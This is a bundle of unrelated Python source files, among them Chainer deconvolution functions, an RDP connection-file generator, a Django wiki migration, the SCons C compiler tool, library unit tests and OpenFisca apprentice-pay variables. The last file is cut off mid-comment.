Input variable of shape :math:`(n, c_I, d_1, d_2, ..., d_N)`.
W (:class:`~chainer.Variable` or :ref:`ndarray`):
Weight variable of shape :math:`(c_I, c_O, k_1, k_2, ..., k_N)`.
b (None or :class:`~chainer.Variable` or :ref:`ndarray`):
One-dimensional bias variable with length :math:`c_O` (optional).
stride (:class:`int` or :class:`tuple` of :class:`int` s):
Stride of filter applications :math:`(s_1, s_2, ..., s_N)`.
``stride=s`` is equivalent to ``(s, s, ..., s)``.
pad (:class:`int` or :class:`tuple` of :class:`int` s):
Spatial padding width for input arrays
:math:`(p_1, p_2, ..., p_N)`. ``pad=p`` is equivalent to
``(p, p, ..., p)``.
outsize (None or :class:`tuple` of :class:`int` s):
Expected output size of deconvolutional operation. It should be a
tuple of ints :math:`(l_1, l_2, ..., l_N)`. Default value is
``None`` and the outsize is estimated by input size, stride and
pad.
dilate (:class:`int` or :class:`tuple` of :class:`int` s):
Dilation factor of filter applications.
``dilate=d`` and ``dilate=(d, d, ..., d)`` are equivalent.
groups (:class:`int`):
The number of groups to use grouped convolution.
The default is one, where grouped convolution is not used.
Returns:
~chainer.Variable:
Output variable of shape :math:`(n, c_O, l_1, l_2, ..., l_N)`.
.. seealso::
:class:`~chainer.links.DeconvolutionND` to manage the model parameters
``W`` and ``b``.
.. seealso:: :func:`deconvolution_2d`
.. admonition:: Example
**Example1**: the case when ``outsize`` is not given.
>>> n = 10
>>> c_i, c_o = 3, 1
>>> d1, d2, d3 = 5, 10, 15
>>> k1, k2, k3 = 10, 10, 10
>>> p1, p2, p3 = 5, 5, 5
>>> x = np.random.uniform(0, 1, (n, c_i, d1, d2, d3)).\
astype(np.float32)
>>> x.shape
(10, 3, 5, 10, 15)
>>> W = np.random.uniform(0, 1, (c_i, c_o, k1, k2, k3)).\
astype(np.float32)
>>> W.shape
(3, 1, 10, 10, 10)
>>> b = np.random.uniform(0, 1, (c_o)).astype(np.float32)
>>> b.shape
(1,)
>>> s1, s2, s3 = 2, 4, 6
>>> y = F.deconvolution_nd(x, W, b, stride=(s1, s2, s3), \
pad=(p1, p2, p3))
>>> y.shape
(10, 1, 8, 36, 84)
>>> l1 = s1 * (d1 - 1) + k1 - 2 * p1
>>> l2 = s2 * (d2 - 1) + k2 - 2 * p2
>>> l3 = s3 * (d3 - 1) + k3 - 2 * p3
>>> y.shape == (n, c_o, l1, l2, l3)
True
**Example2**: the case when ``outsize`` is given.
>>> n = 10
>>> c_i, c_o = 3, 1
>>> d1, d2, d3 = 5, 10, 15
>>> k1, k2, k3 = 10, 10, 10
>>> p1, p2, p3 = 5, 5, 5
>>> x = np.random.uniform(0, 1, (n, c_i, d1, d2, d3)).\
astype(np.float32)
>>> x.shape
(10, 3, 5, 10, 15)
>>> W = np.random.uniform(0, 1, (c_i, c_o, k1, k2, k3)).\
astype(np.float32)
>>> W.shape
(3, 1, 10, 10, 10)
>>> b = np.random.uniform(0, 1, (c_o)).astype(np.float32)
>>> b.shape
(1,)
>>> s1, s2, s3 = 2, 4, 6
>>> l1, l2, l3 = 9, 38, 87
>>> d1 == int((l1 + 2 * p1 - k1) / s1) + 1
True
>>> d2 == int((l2 + 2 * p2 - k2) / s2) + 1
True
>>> d3 == int((l3 + 2 * p3 - k3) / s3) + 1
True
>>> y = F.deconvolution_nd(x, W, b, stride=(s1, s2, s3), \
pad=(p1, p2, p3), outsize=(l1, l2, l3))
>>> y.shape
(10, 1, 9, 38, 87)
>>> y.shape == (n, c_o, l1, l2, l3)
True
"""
ndim = len(x.shape[2:])
func = DeconvolutionND(
ndim, stride, pad, outsize, dilate=dilate, groups=groups)
args = (x, W) if b is None else (x, W, b)
y, = func.apply(args)
return y
def deconvolution_1d(x, W, b=None, stride=1, pad=0, outsize=None,
dilate=1, groups=1):
"""1-dimensional deconvolution function.
.. note::
This function calls :func:`~chainer.functions.deconvolution_nd`
internally, so see the details of the behavior in
the documentation of :func:`~chainer.functions.deconvolution_nd`.
"""
if len(x.shape[2:]) != 1:
raise ValueError(
'The number of dimensions under channel dimension of the input '
'\'x\' should be 1. But the actual ndim was {}.'.format(
len(x.shape[2:])))
return deconvolution_nd(x, W, b, stride, pad, outsize, dilate, groups)
def deconvolution_3d(x, W, b=None, stride=1, pad=0, outsize=None,
dilate=1, groups=1):
"""3-dimensional deconvolution function.
.. note::
This function calls :func:`~chainer.functions.deconvolution_nd`
internally, so see the details of the behavior in
the documentation of :func:`~chainer.functions.deconvolution_nd`.
"""
if len(x.shape[2:]) != 3:
raise ValueError(
'The number of dimensions under channel dimension of the input '
'\'x\' should be 3. But the actual ndim was {}.'.format(
len(x.shape[2:])))
return deconvolution_nd(x, W, b, stride, pad, outsize, dilate, groups)
|
#! /usr/bin/env python
""" Quick Script to Generate RDP files """
import sys
import re
import os
import logging
import time
from logging.handlers import RotatingFileHandler
logger = logging.getLogger("RotatingLog")
logger.setLevel(logging.INFO)
handler = RotatingFileHandler('c:\\var\\logs\\syslog.log')
logger.addHandler(handler)
def log(msg):
fmt_msg = time.strftime("%y-%m-%d:%H-%M: ") + msg
print("%s" % fmt_msg)
logger.info(fmt_msg)
infile, outdir = sys.argv[1], sys.argv[2]
log("Starting Operations")
with open(infile) as inf:
log("opened file %s" % infile)
for line in inf:
pattern = re.compile("^#node")
if pattern.match(line):
line = line.split(':')
f = os.path.join(sys.argv[2],line[1]+".rdp")
log("opening rdp file for writing %s" % f)
t = open(f,'w+')
template = """
screen mode id:i:2
use multimon:i:0
desktopwidth:i:1920
desktopheight:i:1080
session bpp:i:32
winposstr:s:0,3,0,0,800,600
compression:i:1
keyboardhook:i:2
audiocapturemode:i:0
videoplaybackmode:i:1
connection type:i:7
networkautodetect:i:1
bandwidthautodetect:i:1
displayconnectionbar:i:1
username:s:{nuser}
enableworkspacereconnect:i:0
disable wallpaper:i:0
allow font smoothing:i:0
allow desktop composition:i:0
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
full address:s:{ip}
audiomode:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
redirectclipboard:i:1
redirectposdevices:i:0
autoreconnection enabled:i:1
authentication level:i:2
prompt for credentials:i:0
negotiate security layer:i:1
remoteapplicationmode:i:0
alternate shell:s:
shell working directory:s:
gatewayhostname:s:
gatewayusagemethod:i:4
gatewaycredentialssource:i:4
gatewayprofileusagemethod:i:0
promptcredentialonce:i:0
gatewaybrokeringtype:i:0
use redirection server name:i:0
rdgiskdcproxy:i:0
kdcproxyname:s:
"""
import getpass
username = getpass.getuser()
context = {
"ip":line[2],
"nuser":username
}
t.write(template.format(**context))
log("Written template")
t.close()
|
# Under MIT license, see LICENSE.txt
import numpy as np
from .Action import Action
from RULEngine.Util.constant import PLAYER_PER_TEAM, KICK_MAX_SPD
from ai.Util.ai_command import AICommand, AICommandType
from RULEngine.Util.Pose import Pose
from RULEngine.Util.Position import Position
class Kick(Action):
"""
Action Kick: Actionne le kick du robot
Méthodes :
exec(self): Retourne la position actuelle et une force de kick
Attributs (en plus de ceux de Action):
player_id : L'identifiant du joueur qui doit frapper la balle
"""
def __init__(self, p_game_state, p_player_id, p_force, target=Pose()):
"""
:param p_game_state: L'état courant du jeu.
:param p_player_id: Identifiant du joueur qui frappe la balle
:param p_force: force du kicker (float entre 0 et 1)
"""
Action.__init__(self, p_game_state)
assert(isinstance(p_player_id, int))
assert PLAYER_PER_TEAM >= p_player_id >= 0
assert(isinstance(p_force, (int, float)))
assert(KICK_MAX_SPD >= p_force >= 0)
self.player_id = p_player_id
self.force = p_force
self.target = target
self.speed_pose = Pose()
def exec(self):
"""
Execute le kick
:return: Un tuple (Pose, kick)
où Pose est la destination actuelle du joueur (ne pas la modifier)
kick est un float entre 0 et 1 qui determine la force du kick
"""
target = self.target.position.conv_2_np()
player = self.game_state.game.friends.players[self.player_id].pose.position.conv_2_np()
player_to_target = target - player
player_to_target = 0.3 * player_to_target / np.linalg.norm(player_to_target)
self.speed_pose = Pose(Position.from_np(player_to_target))
return AICommand(self.player_id, AICommandType.MOVE, **{"pose_goal": self.speed_pose,
"speed_flag": True,
"kick": True,
"kick_strength": self.force})
|
"""
Optional fixer to transform set() calls to set literals.
"""
# Author: Benjamin Peterson
from lib2to3 import fixer_base, pytree
from lib2to3.fixer_util import token, syms
class FixSetLiteral(fixer_base.BaseFix):
BM_compatible = True
explicit = True
PATTERN = """power< 'set' trailer< '('
(atom=atom< '[' (items=listmaker< any ((',' any)* [',']) >
|
single=any) ']' >
|
atom< '(' items=testlist_gexp< any ((',' any)* [',']) > ')' >
)
')' > >
"""
def transform(self, node, results):
single = results.get("single")
if single:
# Make a fake listmaker
fake = pytree.Node(syms.listmaker, [single.clone()])
single.replace(fake)
items = fake
else:
items = results["items"]
# Build the contents of the literal
literal = [pytree.Leaf(token.LBRACE, "{")]
literal.extend(n.clone() for n in items.children)
literal.append(pytree.Leaf(token.RBRACE, "}"))
# Set the prefix of the right brace to that of the ')' or ']'
literal[-1].prefix = items.next_sibling.prefix
maker = pytree.Node(syms.dictsetmaker, literal)
maker.prefix = node.prefix
# If the original was a one tuple, we need to remove the extra comma.
if len(maker.children) == 4:
n = maker.children[2]
n.remove()
maker.children[-1].prefix = n.prefix
# Finally, replace the set call with our shiny new literal.
return maker
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import mptt.fields
from django.conf import settings
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('sites', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0001_initial'),
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('created', models.DateTimeField(verbose_name='created', auto_now_add=True)),
('modified', models.DateTimeField(verbose_name='modified', auto_now=True, help_text='Article properties last modified')),
('group_read', models.BooleanField(default=True, verbose_name='group read access')),
('group_write', models.BooleanField(default=True, verbose_name='group write access')),
('other_read', models.BooleanField(default=True, verbose_name='others read access')),
('other_write', models.BooleanField(default=True, verbose_name='others write access')),
],
options={
'permissions': (('moderate', 'Can edit all articles and lock/unlock/restore'), ('assign', 'Can change ownership of any article'), ('grant', 'Can assign permissions to other users')),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ArticleForObject',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('object_id', models.PositiveIntegerField(verbose_name='object ID')),
('is_mptt', models.BooleanField(default=False, editable=False)),
('article', models.ForeignKey(to='wiki.Article')),
('content_type', models.ForeignKey(related_name='content_type_set_for_articleforobject', verbose_name='content type', to='contenttypes.ContentType')),
],
options={
'verbose_name_plural': 'Articles for object',
'verbose_name': 'Article for object',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ArticlePlugin',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('deleted', models.BooleanField(default=False)),
('created', models.DateTimeField(auto_now_add=True)),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ArticleRevision',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('revision_number', models.IntegerField(verbose_name='revision number', editable=False)),
('user_message', models.TextField(blank=True)),
('automatic_log', models.TextField(blank=True, editable=False)),
('ip_address', models.IPAddressField(null=True, verbose_name='IP address', blank=True, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
('created', models.DateTimeField(auto_now_add=True)),
('deleted', models.BooleanField(default=False, verbose_name='deleted')),
('locked', models.BooleanField(default=False, verbose_name='locked')),
('content', models.TextField(blank=True, verbose_name='article contents')),
('title', models.CharField(max_length=512, verbose_name='article title', help_text='Each revision contains a title field that must be filled out, even if the title has not changed')),
('article', models.ForeignKey(to='wiki.Article', verbose_name='article')),
('previous_revision', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wiki.ArticleRevision')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, blank=True, to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'get_latest_by': 'revision_number',
'ordering': ('created',),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='ReusablePlugin',
fields=[
('articleplugin_ptr', models.OneToOneField(primary_key=True, parent_link=True, to='wiki.ArticlePlugin', serialize=False, auto_created=True)),
('articles', models.ManyToManyField(related_name='shared_plugins_set', to='wiki.Article')),
],
options={
},
bases=('wiki.articleplugin',),
),
migrations.CreateModel(
name='RevisionPlugin',
fields=[
('articleplugin_ptr', models.OneToOneField(primary_key=True, parent_link=True, to='wiki.ArticlePlugin', serialize=False, auto_created=True)),
],
options={
},
bases=('wiki.articleplugin',),
),
migrations.CreateModel(
name='RevisionPluginRevision',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('revision_number', models.IntegerField(verbose_name='revision number', editable=False)),
('user_message', models.TextField(blank=True)),
('automatic_log', models.TextField(blank=True, editable=False)),
('ip_address', models.IPAddressField(null=True, verbose_name='IP address', blank=True, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
('created', models.DateTimeField(auto_now_add=True)),
('deleted', models.BooleanField(default=False, verbose_name='deleted')),
('locked', models.BooleanField(default=False, verbose_name='locked')),
('plugin', models.ForeignKey(related_name='revision_set', to='wiki.RevisionPlugin')),
('previous_revision', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, blank=True, to='wiki.RevisionPluginRevision')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, blank=True, to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'get_latest_by': 'revision_number',
'ordering': ('-created',),
},
bases=(models.Model,),
),
migrations.CreateModel(
name='SimplePlugin',
fields=[
('articleplugin_ptr', models.OneToOneField(primary_key=True, parent_link=True, to='wiki.ArticlePlugin', serialize=False, auto_created=True)),
('article_revision', models.ForeignKey(to='wiki.ArticleRevision')),
],
options={
},
bases=('wiki.articleplugin',),
),
migrations.CreateModel(
name='URLPath',
fields=[
('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
('slug', models.SlugField(null=True, blank=True, verbose_name='slug')),
('lft', models.PositiveIntegerField(db_index=True, editable=False)),
('rght', models.PositiveIntegerField(db_index=True, editable=False)),
('tree_id', models.PositiveIntegerField(db_index=True, editable=False)),
('level', models.PositiveIntegerField(db_index=True, editable=False)),
('article', models.ForeignKey(editable=False, to='wiki.Article', verbose_name='Cache lookup value for articles')),
('parent', mptt.fields.TreeForeignKey(related_name='children', null=True, blank=True, to='wiki.URLPath')),
('site', models.ForeignKey(to='sites.Site')),
],
options={
'verbose_name_plural': 'URL paths',
'verbose_name': 'URL path',
},
bases=(models.Model,),
),
migrations.AlterUniqueTogether(
name='urlpath',
unique_together=set([('site', 'parent', 'slug')]),
),
migrations.AddField(
model_name='revisionplugin',
name='current_revision',
field=models.OneToOneField(related_name='plugin_set', null=True, help_text='The revision being displayed for this plugin. If you need to do a roll-back, simply change the value of this field.', blank=True, to='wiki.RevisionPluginRevision', verbose_name='current revision'),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='articlerevision',
unique_together=set([('article', 'revision_number')]),
),
migrations.AddField(
model_name='articleplugin',
name='article',
field=models.ForeignKey(to='wiki.Article', verbose_name='article'),
preserve_default=True,
),
migrations.AlterUniqueTogether(
name='articleforobject',
unique_together=set([('content_type', 'object_id')]),
),
migrations.AddField(
model_name='article',
name='current_revision',
field=models.OneToOneField(related_name='current_set', null=True, help_text='The revision being displayed for this article. If you need to do a roll-back, simply change the value of this field.', blank=True, to='wiki.ArticleRevision', verbose_name='current revision'),
preserve_default=True,
),
migrations.AddField(
model_name='article',
name='group',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, help_text='Like in a UNIX file system, permissions can be given to a user according to group membership. Groups are handled through the Django auth system.', blank=True, to='auth.Group', verbose_name='group'),
preserve_default=True,
),
migrations.AddField(
model_name='article',
name='owner',
field=models.ForeignKey(related_name='owned_articles', null=True, on_delete=django.db.models.deletion.SET_NULL, help_text='The owner of the article, usually the creator. The owner always has both read and write access.', blank=True, to=settings.AUTH_USER_MODEL, verbose_name='owner'),
preserve_default=True,
),
]
|
"""SCons.Tool.cc
Tool-specific initialization for generic Posix C compilers.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/cc.py 2013/03/03 09:48:35 garyo"
import SCons.Tool
import SCons.Defaults
import SCons.Util
CSuffixes = ['.c', '.m']
if not SCons.Util.case_sensitive_suffixes('.c', '.C'):
CSuffixes.append('.C')
def add_common_cc_variables(env):
"""
Add underlying common "C compiler" variables that
are used by multiple tools (specifically, c++).
"""
if '_CCCOMCOM' not in env:
env['_CCCOMCOM'] = '$CPPFLAGS $_CPPDEFFLAGS $_CPPINCFLAGS'
# It's a hack to test for darwin here, but the alternative
# of creating an applecc.py to contain this seems overkill.
# Maybe someday the Apple platform will require more setup and
# this logic will be moved.
env['FRAMEWORKS'] = SCons.Util.CLVar('')
env['FRAMEWORKPATH'] = SCons.Util.CLVar('')
if env['PLATFORM'] == 'darwin':
env['_CCCOMCOM'] = env['_CCCOMCOM'] + ' $_FRAMEWORKPATH'
if 'CCFLAGS' not in env:
env['CCFLAGS'] = SCons.Util.CLVar('')
if 'SHCCFLAGS' not in env:
env['SHCCFLAGS'] = SCons.Util.CLVar('$CCFLAGS')
def generate(env):
"""
Add Builders and construction variables for C compilers to an Environment.
"""
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
for suffix in CSuffixes:
static_obj.add_action(suffix, SCons.Defaults.CAction)
shared_obj.add_action(suffix, SCons.Defaults.ShCAction)
static_obj.add_emitter(suffix, SCons.Defaults.StaticObjectEmitter)
shared_obj.add_emitter(suffix, SCons.Defaults.SharedObjectEmitter)
add_common_cc_variables(env)
env['CC'] = 'cc'
env['CFLAGS'] = SCons.Util.CLVar('')
env['CCCOM'] = '$CC -o $TARGET -c $CFLAGS $CCFLAGS $_CCCOMCOM $SOURCES'
env['SHCC'] = '$CC'
env['SHCFLAGS'] = SCons.Util.CLVar('$CFLAGS')
env['SHCCCOM'] = '$SHCC -o $TARGET -c $SHCFLAGS $SHCCFLAGS $_CCCOMCOM $SOURCES'
env['CPPDEFPREFIX'] = '-D'
env['CPPDEFSUFFIX'] = ''
env['INCPREFIX'] = '-I'
env['INCSUFFIX'] = ''
env['SHOBJSUFFIX'] = '.os'
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 0
env['CFILESUFFIX'] = '.c'
def exists(env):
return env.Detect('cc')
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
from insights.parsers.cinder_log import CinderApiLog, CinderVolumeLog
from insights.tests import context_wrap
from datetime import datetime
api_log = """
2019-04-16 21:01:02.072 21 INFO cinder.api.openstack.wsgi [req-e7b42a20-4109-45b7-b18a-ae5ad4831909 - - - - -] OPTIONS http://controller-0.internalapi.localdomain/
2019-04-16 21:01:02.073 21 DEBUG cinder.api.openstack.wsgi [req-e7b42a20-4109-45b7-b18a-ae5ad4831909 - - - - -] Empty body provided in request get_body /usr/lib/python2.7/site-packages/cinder/api/openstack/wsgi.py:718
2019-04-16 21:01:02.073 21 DEBUG cinder.api.openstack.wsgi [req-e7b42a20-4109-45b7-b18a-ae5ad4831909 - - - - -] Calling method '<bound method VersionsController.all of <cinder.api.versions.VersionsController object at 0x7f44fe7ee1d0>>' _process_stack /usr/lib/python2.7/site-packages/cinder/api/openstack/wsgi.py:871
2019-04-16 21:01:02.074 21 INFO cinder.api.openstack.wsgi [req-e7b42a20-4109-45b7-b18a-ae5ad4831909 - - - - -] http://controller-0.internalapi.localdomain/ returned with HTTP 300
2019-04-16 21:01:04.079 22 INFO cinder.api.openstack.wsgi [req-43db684e-f4eb-4b23-9f8e-82beb95ab0b7 - - - - -] OPTIONS http://controller-0.internalapi.localdomain/
"""
CINDER_LOG = """
2015-06-19 07:31:41.020 7947 DEBUG cinder.openstack.common.periodic_task [-] Running periodic task VolumeManager._publish_service_capabilities run_periodic_tasks /usr/lib/python2.7/site-packages/cinder/openstack/common/periodic_task.py:178
2015-06-19 07:31:41.022 7947 DEBUG cinder.manager [-] Notifying Schedulers of capabilities ... _publish_service_capabilities /usr/lib/python2.7/site-packages/cinder/manager.py:128
2015-06-19 07:31:41.025 7947 DEBUG cinder.openstack.common.periodic_task [-] Running periodic task VolumeManager._report_driver_status run_periodic_tasks /usr/lib/python2.7/site-packages/cinder/openstack/common/periodic_task.py:178
2015-06-19 07:31:41.026 7947 INFO cinder.volume.manager [-] Updating volume status
2015-11-27 11:22:45.416 16656 INFO oslo.messaging._drivers.impl_rabbit [-] Connecting to AMQP server on 169.254.10.22:5672
2015-11-27 11:22:45.426 16656 INFO oslo.messaging._drivers.impl_rabbit [-] Connected to AMQP server on 169.254.10.22:5672
2015-11-27 11:23:07.146 16656 INFO cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Updating volume status
2015-11-27 11:23:07.148 16656 WARNING cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Unable to update stats, LVMISCSIDriver -2.0.0 (config name rbd) driver is uninitialized.
"""
def test_cinder_api_log():
log = CinderApiLog(context_wrap(api_log))
assert len(log.get(["req-"])) == 5
assert len(log.get("e7b42a20-4109-45b7-b18a-ae5ad4831909")) == 4
assert len(list(log.get_after(datetime(2019, 4, 16, 21, 0, 0)))) == 5
def test_get_cinder_log():
log = CinderVolumeLog(context_wrap(CINDER_LOG))
assert len(log.lines) == 8
assert sorted([i['raw_message'] for i in log.get('cinder.volume.manager')]) == sorted([
'2015-06-19 07:31:41.026 7947 INFO cinder.volume.manager [-] Updating volume status',
'2015-11-27 11:23:07.146 16656 INFO cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Updating volume status',
'2015-11-27 11:23:07.148 16656 WARNING cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Unable to update stats, LVMISCSIDriver -2.0.0 (config name rbd) driver is uninitialized.',
])
assert sorted([i['raw_message'] for i in list(log.get_after(datetime(2015, 11, 27, 11, 23, 0)))]) == sorted([
'2015-11-27 11:23:07.146 16656 INFO cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Updating volume status',
'2015-11-27 11:23:07.148 16656 WARNING cinder.volume.manager [req-a8c22cdb-e21b-497f-affe-9380478decae - - - - -] Unable to update stats, LVMISCSIDriver -2.0.0 (config name rbd) driver is uninitialized.',
])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import unittest
from os import sep
from pyowm.commons.cityidregistry import CityIDRegistry
from pyowm.weatherapi25.location import Location
class TestCityIDRegistryReadsFS(unittest.TestCase):
_prefix = 'cityids'+sep
_instance = CityIDRegistry(_prefix+'%03d-%03d.txt.bz2')
def test_assess_subfile_from(self):
self.assertEqual(self._instance._assess_subfile_from('b-city'),
self._prefix+'097-102.txt.bz2')
self.assertEqual(self._instance._assess_subfile_from('h-city'),
self._prefix+'103-108.txt.bz2')
self.assertEqual(self._instance._assess_subfile_from('n-city'),
self._prefix+'109-114.txt.bz2')
self.assertEqual(self._instance._assess_subfile_from('t-city'),
self._prefix+'115-122.txt.bz2')
self.assertRaises(ValueError, CityIDRegistry._assess_subfile_from,
self._instance, '123abc')
self.assertRaises(ValueError, CityIDRegistry._assess_subfile_from,
self._instance, '{abc')
def test_lookup_line_by_city_name(self):
expected = u'Dongen,2756723,51.626671,4.93889,NL'
self.assertEqual(expected,
self._instance._lookup_line_by_city_name('dongen'))
self.assertTrue(self._instance. \
_lookup_line_by_city_name('aaaaaaaa') is None)
def test_ids_for(self):
self.assertEqual([(2756723, 'Dongen', 'NL')], self._instance.ids_for('dongen'))
self.assertEqual([], self._instance.ids_for('aaaaaaaaaa'))
def test_ids_for_fails_with_malformed_inputs(self):
self.assertRaises(ValueError, CityIDRegistry.ids_for, self._instance, '123abc')
def test_locations_for(self):
expected = Location('Dongen', 4.938890, 51.626671, 2756723, 'NL')
result_list = self._instance.locations_for('dongen')
self.assertEqual(1, len(result_list))
result = result_list[0]
self.assertEqual(result.name, expected.name)
self.assertEqual(result.country, expected.country)
self.assertEqual(result.id, expected.id)
self.assertEqual(result.lat, expected.lat)
self.assertEqual(result.lon, expected.lon)
self.assertEqual([], self._instance.locations_for('aaaaaaaaaa'))
def test_locations_for_fails_with_malformed_inputs(self):
self.assertRaises(ValueError, CityIDRegistry.locations_for, self._instance, '123abc')
def test_ids_for_more_cases(self):
result = self._instance.ids_for("bologna", matching='exact')
self.assertEqual(0, len(result))
result = self._instance.ids_for("Abbans-Dessus")
self.assertEqual(2, len(result))
self.assertTrue((3038800, 'Abbans-Dessus', 'FR') in result)
self.assertTrue((6452202, 'Abbans-Dessus', 'FR') in result)
result = self._instance.ids_for("Dessus", matching='like')
self.assertEqual(6, len(result))
def test_locations_for_more_cases(self):
expected1 = Location('Abbans-Dessus', 5.88188, 47.120548, 3038800, 'FR')
expected2 = Location('Abbans-Dessus', 5.88333, 47.116669, 6452202, 'FR')
result = self._instance.locations_for("Abbans-Dessus")
self.assertEqual(2, len(result))
for l in result:
self.assertTrue(isinstance(l, Location))
self.assertTrue(l.id in [expected1.id, expected2.id])
if __name__ == "__main__":
unittest.main()
|
# -*- coding: utf-8 -*-
from __future__ import division
from numpy import datetime64, timedelta64
from ....base import * # noqa analysis:ignore
class apprenti(Variable):
column = BoolCol
entity_class = Individus
label = u"L'individu est apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
def function(self, simulation, period):
period = period.this_month
age = simulation.calculate('age', period)
age_condition = (16 <= age) * (age < 25)
apprentissage_contrat_debut = simulation.calculate('apprentissage_contrat_debut', period)
duree_contrat = (
datetime64(period.start) + timedelta64(1, 'D') - apprentissage_contrat_debut
).astype('timedelta64[Y]')
anciennete_contrat = (duree_contrat < timedelta64(3, 'Y'))
return period, age_condition * anciennete_contrat
class remuneration_apprenti(Variable):
column = FloatCol
entity_class = Individus
label = u"Rémunération de l'apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
# Aux jeunes de 16 à 25 ans (exceptionnellement 15 ans, s'ils ont effectué la scolarité du premier cycle de
# l'enseignement secondaire, ou, s'ils suivent une "formation apprentissage junior").
#
# Depuis le 30 juillet 2011, il est possible pour un jeune mineur ayant 15 ans au cours de l'année civile, de
# souscrire un contrat d'apprentissage s'il justifie avoir accompli la scolarité du premier cycle de l'enseignement
# secondaire, ou avoir suivi une formation dans le cadre du dispositif d'initiation aux métiers en
# alternance (DIMA).
def function(self, simulation, period):
period = period.this_month
age = simulation.calculate('age', period)
apprentissage_contrat_debut = simulation.calculate('apprentissage_contrat_debut', period)
smic = simulation.legislation_at(period.start).cotsoc.gen.smic_h_b * 52 * 35 / 12
anciennete_contrat = (
datetime64(period.start) + timedelta64(1, 'D') - apprentissage_contrat_debut
).astype('timedelta64[Y]')
apprenti = simulation.calculate('apprenti', period)
salaire_en_smic = [ # TODO: move to parameters
dict(
part_de_smic_by_anciennete = {
1: .25,
2: .41,
3: .53,
},
age_min = 15,
age_max = 18,
),
dict(
part_de_smic_by_anciennete = {
1: .37,
2: .49,
3: .61,
},
age_min = 18,
age_max = 21,
),
dict(
part_de_smic_by_anciennete = {
1: .53,
2: .65,
3: .78,
},
age_min = 21,
age_max = 99
)
]
output = age * 0.0
for age_interval in salaire_en_smic:
age_condition = (age_interval["age_min"] <= age) * (age < age_interval["age_max"])
output[age_condition] = sum([
(anciennete_contrat[age_condition] == timedelta64(anciennete, 'Y')) * part_de_smic
for anciennete, part_de_smic in age_interval['part_de_smic_by_anciennete'].iteritems()
])
return period, output * smic * apprenti
class exoneration_cotisations_employeur_apprenti(Variable):
column = FloatCol
entity_class = Individus
label = u"Exonération de cotisations employeur pour l'emploi d'un apprenti"
url = "http://www.apce.com/pid927/contrat-d-apprentissage.html?espace=1&tp=1&pagination=2"
# Artisans et employeurs de moins de 11 salariés
#
# - exonération totale (part patronale et salariale) des charges sociales,
# - sauf : cotisation sociale patronale d'accidents du travail et des maladies professionnelles, cotisation
# supplémentaire accidents du travail et cotisation supplémentaire de retraite complémentaire (c'est-à-dire
# dépassant le taux minimum obligatoire).
#
